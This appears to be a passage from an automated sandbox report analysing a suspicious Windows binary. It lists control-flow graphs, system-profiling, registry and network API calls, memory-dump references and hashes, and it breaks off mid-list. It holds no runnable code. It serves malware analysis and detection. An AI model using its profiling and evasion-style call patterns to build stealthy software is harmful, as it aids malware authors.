1061cf0 call 1061ee0 call f18e78 1245->1248 1246->1245 1246->1246 1247->1248 1254 b92974-b92979 1248->1254 1255 b929a9-b929fe call f1a2b0 call 1061cf0 call 1061ee0 1254->1255 1256 b9297b-b929a4 call 1061cf0 call 1061ee0 1254->1256 1256->1255 1267->1196 1268->1196 1269->1196 1270->1196 1271->1196 1272->1196 1273->1196 1274->1196 1275->1196 1276->1196 1277->1196 1278->1196 1279->1196 1280->1196 1281->1196 1282->1196 1283->1196 1284->1196 1285->1196 1286->1196 1287->1196 1288->1196 1289->1196 1290->1196 1291->1196 1292->1196 1293->1196 1294->1196 1295->1196
                                            APIs
                                            • GetSystemInfo.KERNELBASE ref: 00B92579
                                            • GlobalMemoryStatusEx.KERNELBASE ref: 00B925CC
                                            • GetDriveTypeA.KERNELBASE ref: 00B92647
                                            • GetDiskFreeSpaceExA.KERNELBASE ref: 00B9267E
                                            • KiUserCallbackDispatcher.NTDLL ref: 00B927E2
                                            • FindFirstFileW.KERNELBASE ref: 00B928F8
                                            • FindNextFileW.KERNELBASE ref: 00B9291F
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2137568261.0000000000B91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                            • Associated: 00000000.00000002.2137549440.0000000000B90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2137568261.0000000001170000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2137568261.00000000012D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2137568261.00000000012D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138452275.00000000012DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.00000000012DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.0000000001469000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.0000000001576000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.000000000157A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.000000000165B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.0000000001662000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.0000000001671000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138724514.0000000001672000.00000080.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138830242.000000000182B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138846251.000000000182D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_b90000_TX5LAYBZRI.jbxd
                                            Similarity
                                            • API ID: FileFind$CallbackDiskDispatcherDriveFirstFreeGlobalInfoMemoryNextSpaceStatusSystemTypeUser
                                            • String ID: @$`
                                            • API String ID: 3271271169-3318628307
                                            • Opcode ID: 477b0317c96453aec25ce941188cafe7af70f0faeb64a40ac079ec0272127c81
                                            • Instruction ID: f33ea7197e318283369dfe06a0cf00e75fd5fa04aba4645e10e03ca9b3af7519
                                            • Opcode Fuzzy Hash: 477b0317c96453aec25ce941188cafe7af70f0faeb64a40ac079ec0272127c81
                                            • Instruction Fuzzy Hash: 14D185B49053099FCB14EFA8C98469EBBF5EF84354F0089A9E898D7344E7359A84CF52
                                            Function 00B929FF Relevance: 12.6, APIs: 6, Strings: 1, Instructions: 321registryfileCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 1296 b929ff-b92a2f FindFirstFileA 1297 b92a38 1296->1297 1298 b92a31-b92a36 1296->1298 1299 b92a3d-b92a91 call 1061e50 call 1061ee0 RegOpenKeyExA 1297->1299 1298->1299 1304 b92a9a 1299->1304 1305 b92a93-b92a98 1299->1305 1306 b92a9f-b92b0c call 1061e50 call 1061ee0 CharUpperA call f18da0 1304->1306 1305->1306 1314 b92b0e-b92b13 1306->1314 1315 b92b15 1306->1315 1316 b92b1a-b92b92 call 1061e50 call 1061ee0 call f18e80 call f18e70 1314->1316 1315->1316 1325 b92bcc-b92c66 QueryFullProcessImageNameA CloseHandle call f18da0 1316->1325 1326 b92b94-b92ba3 1316->1326 1336 b92c68-b92c6d 1325->1336 1337 b92c6f 1325->1337 1329 b92bb0-b92bca call f18e68 1326->1329 1330 b92ba5-b92bae 1326->1330 1329->1325 1329->1326 1330->1325 1338 b92c74-b92ce9 call 1061e50 call 1061ee0 call f18e80 call f18e70 1336->1338 1337->1338 1347 b92dcf-b92e1c call 1061e50 call 1061ee0 CloseHandle 1338->1347 1348 b92cef-b92d49 call f18bb0 call f18da0 1338->1348 1389 b92e21 call 79c0d3c 1347->1389 1390 b92e21 call 79c0d9d 1347->1390 1391 b92e21 call 79c0dbd 1347->1391 1392 b92e21 call 79c0d1d 1347->1392 1393 b92e21 call 79c0cd4 1347->1393 1394 b92e21 call 79c0c54 1347->1394 1395 b92e21 call 79c0c76 1347->1395 1396 b92e21 call 79c0c8c 1347->1396 1397 b92e21 call 79c0cee 1347->1397 1398 b92e21 call 79c0d4f 1347->1398 1399 b92e21 call 79c0cc4 1347->1399 1400 b92e21 call 79c0c66 1347->1400 1401 b92e21 call 79c0de0 1347->1401 1359 b92d99-b92dad 1348->1359 1360 b92d4b-b92d63 call f18da0 1348->1360 1358 b92e23-b92e2e 1361 b92e30-b92e35 1358->1361 1362 b92e37 1358->1362 1359->1347 1360->1359 1368 b92d65-b92d7d call f18da0 1360->1368 1364 b92e3c-b92ed6 call 1061e50 call 1061ee0 1361->1364 1362->1364 1377 b92ed8-b92ee1 1364->1377 1378 b92eea 1364->1378 1368->1359 1374 b92d7f-b92d97 call f18da0 1368->1374 1374->1359 1382 b92daf-b92dc9 call f18e68 1374->1382 1377->1378 1380 b92ee3-b92ee8 1377->1380 1381 b92eef-b92f16 call 1061e50 call 1061ee0 1378->1381 1380->1381 1382->1347 1382->1348 1389->1358 1390->1358 1391->1358 1392->1358 1393->1358 1394->1358 1395->1358 1396->1358 1397->1358 1398->1358 1399->1358 1400->1358 1401->1358
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2137568261.0000000000B91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                            • Associated: 00000000.00000002.2137549440.0000000000B90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2137568261.0000000001170000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2137568261.00000000012D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2137568261.00000000012D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138452275.00000000012DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.00000000012DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.0000000001469000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.0000000001576000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.000000000157A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.000000000165B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.0000000001662000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.0000000001671000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138724514.0000000001672000.00000080.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138830242.000000000182B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138846251.000000000182D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_b90000_TX5LAYBZRI.jbxd
                                            Similarity
                                            • API ID: CloseHandle$CharFileFindFirstFullImageNameOpenProcessQueryUpper
                                            • String ID: 0
                                            • API String ID: 2406880114-4108050209
                                            • Opcode ID: 435273503424bce78c3800420e84cfbb3e0f0b92402518f1d927e74f559954cd
                                            • Instruction ID: b5829b90f7ee0ffea396255683cddbe23de3f87dabbad8a1617861157830d76e
                                            • Opcode Fuzzy Hash: 435273503424bce78c3800420e84cfbb3e0f0b92402518f1d927e74f559954cd
                                            • Instruction Fuzzy Hash: 16E1D8B49053099FCB14EF68DA8469DBBF5EF44344F1088A9E888E7344EB75D985CF42
                                            Function 00BA05B0 Relevance: 7.4, APIs: 3, Strings: 1, Instructions: 377networkCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 1582 ba05b0-ba05b7 1583 ba07ee 1582->1583 1584 ba05bd-ba05d4 1582->1584 1585 ba05da-ba05e6 1584->1585 1586 ba07e7-ba07ed 1584->1586 1585->1586 1587 ba05ec-ba05f0 1585->1587 1586->1583 1588 ba05f6-ba0620 call ba7350 call b970b0 1587->1588 1589 ba07c7-ba07cc 1587->1589 1594 ba066a-ba068c call bcdec0 1588->1594 1595 ba0622-ba0624 1588->1595 1589->1586 1600 ba0692-ba06a0 1594->1600 1601 ba07d6-ba07e3 call ba7380 1594->1601 1597 ba0630-ba0655 call b970d0 call ba03c0 call ba7450 1595->1597 1621 ba065b-ba0668 call b970e0 1597->1621 1622 ba07ce 1597->1622 1605 ba06a2-ba06a4 1600->1605 1606 ba06f4-ba06f6 1600->1606 1601->1586 1611 ba06b0-ba06e4 call ba73b0 1605->1611 1608 ba07ef-ba082b call ba3000 1606->1608 1609 ba06fc-ba06fe 1606->1609 1625 ba0a2f-ba0a35 1608->1625 1626 ba0831-ba0837 1608->1626 1613 ba072c-ba0754 1609->1613 1611->1601 1627 ba06ea-ba06ee 1611->1627 1617 ba075f-ba078b 1613->1617 1618 ba0756-ba075b 1613->1618 1639 ba0700-ba0703 1617->1639 1640 ba0791-ba0796 1617->1640 1623 ba075d 1618->1623 1624 ba0707-ba0719 WSAEventSelect 1618->1624 1621->1594 1621->1597 1622->1601 1633 ba0723-ba0726 1623->1633 1624->1601 1632 ba071f 1624->1632 1629 ba0a3c-ba0a52 1625->1629 1630 ba0a37-ba0a3a 1625->1630 1635 ba0839-ba084c call ba6fa0 1626->1635 1636 ba0861-ba087e 1626->1636 1627->1611 1628 ba06f0 1627->1628 1628->1606 1629->1601 1637 ba0a58-ba0a81 call ba2f10 1629->1637 1630->1629 1632->1633 1633->1608 1633->1613 1649 ba0a9c-ba0aa4 1635->1649 1650 ba0852 1635->1650 1646 ba0882-ba088d 1636->1646 1637->1601 1655 ba0a87-ba0a97 call ba6df0 1637->1655 1639->1624 1640->1639 1644 ba079c-ba07c2 call b976a0 1640->1644 1644->1639 1653 ba0893-ba08b1 1646->1653 1654 ba0970-ba0975 1646->1654 1649->1601 1650->1636 1652 ba0854-ba085f 1650->1652 1652->1646 1658 ba08c8-ba08f7 1653->1658 1656 ba097b-ba0989 call b970b0 1654->1656 1657 ba0a19-ba0a2c 1654->1657 1655->1601 1656->1657 1665 ba098f-ba099e 1656->1665 1657->1625 1666 ba08f9-ba08fb 1658->1666 1667 ba08fd-ba0925 1658->1667 1668 ba09b0-ba09c1 call b970d0 1665->1668 1669 ba0928-ba093f 1666->1669 1667->1669 1673 ba09c3-ba09c7 1668->1673 1674 ba09a0-ba09ae call b970e0 1668->1674 1675 ba08b3-ba08c2 1669->1675 1676 ba0945-ba096b 1669->1676 1678 ba09e8-ba0a03 WSAEnumNetworkEvents 1673->1678 1674->1657 1674->1668 1675->1654 1675->1658 1676->1675 1680 ba09d0-ba09e6 WSAEventSelect 1678->1680 1681 ba0a05-ba0a17 1678->1681 1680->1674 1680->1678 1681->1680
                                            APIs
                                            • WSAEventSelect.WS2_32(?,8508C483,?), ref: 00BA0712
                                            • WSAEventSelect.WS2_32(?,8508C483,00000000), ref: 00BA09DC
                                            • WSAEnumNetworkEvents.WS2_32(?,00000000,00000000), ref: 00BA09FB
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2137568261.0000000000B91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                            • Associated: 00000000.00000002.2137549440.0000000000B90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2137568261.0000000001170000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2137568261.00000000012D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2137568261.00000000012D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138452275.00000000012DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.00000000012DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.0000000001469000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.0000000001576000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.000000000157A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.000000000165B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.0000000001662000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.0000000001671000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138724514.0000000001672000.00000080.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138830242.000000000182B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138846251.000000000182D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_b90000_TX5LAYBZRI.jbxd
                                            Similarity
                                            • API ID: EventSelect$EnumEventsNetwork
                                            • String ID: multi.c
                                            • API String ID: 2170980988-214371023
                                            • Opcode ID: 400bd3cc6f1de9fa9972db4f64b6f628c45cb32bf4b1471b47b8532ec48f4c29
                                            • Instruction ID: 1560b26af2fd89ac62bf64d6f258332ea841ca591bc79958a1dd39c276d5ccf0
                                            • Opcode Fuzzy Hash: 400bd3cc6f1de9fa9972db4f64b6f628c45cb32bf4b1471b47b8532ec48f4c29
                                            • Instruction Fuzzy Hash: 1AD1D07161C3019FEB10EF24C881B6BB7E5FF96308F04886CF88586252E774E959CB52
                                            Function 00C5B180 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 323COMMON
                                            Download Yara Rule
                                            APIs
                                            • getsockname.WS2_32(-00000020,-00000020,?), ref: 00C5B2B6
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2137568261.0000000000B91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                            • Associated: 00000000.00000002.2137549440.0000000000B90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2137568261.0000000001170000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2137568261.00000000012D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2137568261.00000000012D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138452275.00000000012DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.00000000012DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.0000000001469000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.0000000001576000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.000000000157A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.000000000165B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.0000000001662000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.0000000001671000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138724514.0000000001672000.00000080.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138830242.000000000182B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138846251.000000000182D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_b90000_TX5LAYBZRI.jbxd
                                            Similarity
                                            • API ID: getsockname
                                            • String ID: ares__sortaddrinfo.c$cur != NULL
                                            • API String ID: 3358416759-2430778319
                                            • Opcode ID: faf3cbaca6ffc11a18684f452495beb9aef2635699257256807c73f660967de5
                                            • Instruction ID: 13a95713c13f0ca9ac63a6c8d022544cd29aa5652b283c808cde6665ae7fd312
                                            • Opcode Fuzzy Hash: faf3cbaca6ffc11a18684f452495beb9aef2635699257256807c73f660967de5
                                            • Instruction Fuzzy Hash: 9AC18F796043059FD718DF24C880A6A7BE1FF88345F54886CF8599B3A1EB30ED89CB85
                                            Function 00BA6FA0 Relevance: 1.8, APIs: 1, Instructions: 261COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2137568261.0000000000B91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                            • Associated: 00000000.00000002.2137549440.0000000000B90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2137568261.0000000001170000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2137568261.00000000012D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2137568261.00000000012D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138452275.00000000012DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.00000000012DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.0000000001469000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.0000000001576000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.000000000157A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.000000000165B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.0000000001662000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.0000000001671000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138724514.0000000001672000.00000080.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138830242.000000000182B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138846251.000000000182D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_b90000_TX5LAYBZRI.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: adc2c7230fb314a1a39881901b39c961177f0542dbd6aff5b77d0a936b2b1c34
                                            • Instruction ID: e266d7b8e0bd381d8fdb1ae1add77a8da83d911ae5f06de26f7e4b059cc02b36
                                            • Opcode Fuzzy Hash: adc2c7230fb314a1a39881901b39c961177f0542dbd6aff5b77d0a936b2b1c34
                                            • Instruction Fuzzy Hash: 4291123068D3498BD7358A288CC07BBB2D9EFC6324F258BACE899431D4EF759C41D681
                                            Function 00C5A8C0 Relevance: 1.5, APIs: 1, Instructions: 39COMMON
                                            Download Yara Rule
                                            APIs
                                            • recvfrom.WS2_32(?,?,?,00000000,00001001,?,?,?,?,?,00C4712E,?,?,?,00001001,00000000), ref: 00C5A90C
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2137568261.0000000000B91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                            • Associated: 00000000.00000002.2137549440.0000000000B90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2137568261.0000000001170000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2137568261.00000000012D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2137568261.00000000012D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138452275.00000000012DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.00000000012DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.0000000001469000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.0000000001576000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.000000000157A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.000000000165B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.0000000001662000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.0000000001671000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138724514.0000000001672000.00000080.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138830242.000000000182B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138846251.000000000182D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_b90000_TX5LAYBZRI.jbxd
                                            Similarity
                                            • API ID: recvfrom
                                            • String ID:
                                            • API String ID: 846543921-0
                                            • Opcode ID: 81fac7e04a11ac21ef2fce685a94f9a2c9bc6388c6126832b01d2caa66ec0943
                                            • Instruction ID: 3999048c8298f7cc4c5a9e2bff3e5131e15d3c968de829c33cda294078692535
                                            • Opcode Fuzzy Hash: 81fac7e04a11ac21ef2fce685a94f9a2c9bc6388c6126832b01d2caa66ec0943
                                            • Instruction Fuzzy Hash: 3DF06D79108318AFD2209E02DC44D6BBBEDFFC9754F05466DFD58232118271AE14CAB6
                                            Function 00C4A440 Relevance: 48.3, APIs: 19, Strings: 8, Instructions: 1066registryCOMMON
                                            Download Yara Rule
                                            APIs
                                            • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters,00000000,00020019,?), ref: 00C4AA19
                                            • RegQueryValueExA.KERNELBASE(?,SearchList,00000000,00000000,00000000,00000000), ref: 00C4AA4C
                                            • RegQueryValueExA.KERNELBASE(?,SearchList,00000000,00000000,00000000,?), ref: 00C4AA97
                                            • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,00000000), ref: 00C4AAE9
                                            • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,?), ref: 00C4AB30
                                            • RegCloseKey.KERNELBASE(?), ref: 00C4AB6A
                                            • RegOpenKeyExA.KERNELBASE(80000002,Software\Policies\Microsoft\Windows NT\DNSClient,00000000,00020019,?), ref: 00C4AB82
                                            • RegOpenKeyExA.KERNELBASE(80000002,Software\Policies\Microsoft\System\DNSClient,00000000,00020019,?), ref: 00C4AC46
                                            • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces,00000000,00020019,?), ref: 00C4AD0A
                                            • RegEnumKeyExA.KERNELBASE ref: 00C4AD8D
                                            • RegCloseKey.KERNELBASE(?), ref: 00C4ADD9
                                            • RegEnumKeyExA.KERNELBASE ref: 00C4AE08
                                            • RegOpenKeyExA.KERNELBASE(?,?,00000000,00000001,?), ref: 00C4AE2A
                                            • RegQueryValueExA.KERNELBASE(?,SearchList,00000000,00000000,00000000,00000000), ref: 00C4AE54
                                            • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,00000000), ref: 00C4AF63
                                            • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,?), ref: 00C4AFB2
                                            • RegQueryValueExA.KERNELBASE(?,DhcpDomain,00000000,00000000,00000000,00000000), ref: 00C4B072
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2137568261.0000000000B91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                            • Associated: 00000000.00000002.2137549440.0000000000B90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2137568261.0000000001170000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2137568261.00000000012D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2137568261.00000000012D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138452275.00000000012DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.00000000012DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.0000000001469000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.0000000001576000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.000000000157A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.000000000165B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.0000000001662000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.0000000001671000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138724514.0000000001672000.00000080.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138830242.000000000182B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138846251.000000000182D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_b90000_TX5LAYBZRI.jbxd
                                            Similarity
                                            • API ID: QueryValue$Open$CloseEnum
                                            • String ID: DhcpDomain$Domain$PrimaryDNSSuffix$SearchList$Software\Policies\Microsoft\System\DNSClient$Software\Policies\Microsoft\Windows NT\DNSClient$System\CurrentControlSet\Services\Tcpip\Parameters$System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces
                                            • API String ID: 4217438148-1047472027
                                            • Opcode ID: e87db45f3dea2a367ab849423bf9c3954a482ae41c498343e74ac02b1a1272ce
                                            • Instruction ID: 629e5b4e914a8c9b4ae7e1a5cc8ac5d93530261c82c553ed3b4dfe9978007dee
                                            • Opcode Fuzzy Hash: e87db45f3dea2a367ab849423bf9c3954a482ae41c498343e74ac02b1a1272ce
                                            • Instruction Fuzzy Hash: 3772AEB1648301AFE720DB24DC81BABBBE8BF95740F144828F995D7291E771E944CB63
                                            Function 00BCA550 Relevance: 28.8, APIs: 1, Strings: 15, Instructions: 794COMMON
                                            Download Yara Rule
                                            APIs
                                            • setsockopt.WS2_32(?,00000006,00000001,00000001,00000004), ref: 00BCA832
                                            Strings
                                            • Bind to local port %d failed, trying next, xrefs: 00BCAFE5
                                            • Local port: %hu, xrefs: 00BCAF28
                                            • cf_socket_open() -> %d, fd=%d, xrefs: 00BCA796
                                            • bind failed with errno %d: %s, xrefs: 00BCB080
                                            • sa_addr inet_ntop() failed with errno %d: %s, xrefs: 00BCA6CE
                                            • cf-socket.c, xrefs: 00BCA5CD, 00BCA735
                                            • Couldn't bind to '%s' with errno %d: %s, xrefs: 00BCAE1F
                                            • Trying [%s]:%d..., xrefs: 00BCA689
                                            • Local Interface %s is ip %s using address family %i, xrefs: 00BCAE60
                                            • @, xrefs: 00BCAC42
                                            • Couldn't bind to interface '%s' with errno %d: %s, xrefs: 00BCAD0A
                                            • Name '%s' family %i resolved to '%s' family %i, xrefs: 00BCADAC
                                            • Trying %s:%d..., xrefs: 00BCA7C2, 00BCA7DE
                                            • Could not set TCP_NODELAY: %s, xrefs: 00BCA871
                                            • @, xrefs: 00BCA8F4
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2137568261.0000000000B91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                            • Associated: 00000000.00000002.2137549440.0000000000B90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2137568261.0000000001170000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2137568261.00000000012D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2137568261.00000000012D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138452275.00000000012DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.00000000012DD000.00000040.00000001.01000000.00000003.sdmpDownload File
